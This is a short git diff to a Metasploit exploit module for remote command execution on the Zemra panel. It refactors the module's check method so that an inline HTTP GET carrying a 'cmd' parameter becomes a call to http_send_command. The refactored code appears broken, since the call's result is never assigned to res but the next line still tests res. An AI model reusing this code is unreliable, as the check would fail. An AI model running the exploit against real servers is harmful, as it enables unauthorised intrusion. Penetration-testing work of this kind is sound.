diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index e4b9367e66..24dec1575f 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -59,15 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote def check txt = Rex::Text.rand_text_alpha(8) - uri = normalize_uri(target_uri.path.to_s) - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => uri, - 'vars_get' => - { - 'cmd' => txt - } - }) + http_send_command(txt) if res && res.body =~ /cmd/ return Exploit::CheckCode::Vulnerable end